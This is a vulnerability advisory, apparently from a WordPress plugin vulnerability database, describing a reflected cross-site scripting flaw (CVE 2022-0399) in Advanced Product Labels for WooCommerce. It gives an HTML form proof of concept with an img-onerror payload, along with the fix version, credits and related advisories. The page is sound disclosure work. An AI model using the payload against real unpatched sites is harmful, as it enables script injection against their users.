Advanced Product Labels for WooCommerce < 1.2.3.7 – Reflected Cross-Site Scripting | CVE 2022-0399 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the tax_color_set_type parameter before outputting it back in the berocket_apl_color_listener AJAX action's response, leading to a Reflected Cross-Site Scripting

Proof of Concept

As any authenticated user:

<html>
    <form action="https://example.com/wp-admin/admin-ajax.php?action=berocket_apl_color_listener" method="POST">
        <input type="text" value='"><img src onerror=alert(/XSS/)>' name="tax_color_set_type">
        <input type="submit" value="Send">
    </form>
</html>

Affects Plugins

advanced-product-labels-for-woocommerce

Fixed in 1.2.3.7

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2678919

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

5e5fdcf4-ec2b-4e73-8009-05606b2d5164

Timeline

Publicly Published

2022-02-15 (about 2 years ago)

Added

2022-02-15 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2023-04-24

Title

Woocommerce Tip/Donation <= 1.2 - Shop Manager+ Stored XSS

Published

2015-01-30

Title

Banner Effect Header <= 1.2.7 - Cross-Site Scripting (XSS)

Published

2017-03-01

Title

Admin Custom Login < 2.4.8 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2019-05-04

Title

All-in-One Event Calendar <= 2.5.38 - Cross-Site Scripting (XSS)

Published

2021-09-13

Title

Quiz And Survey Master < 7.3.2 - Admin+ Stored Cross-Site Scripting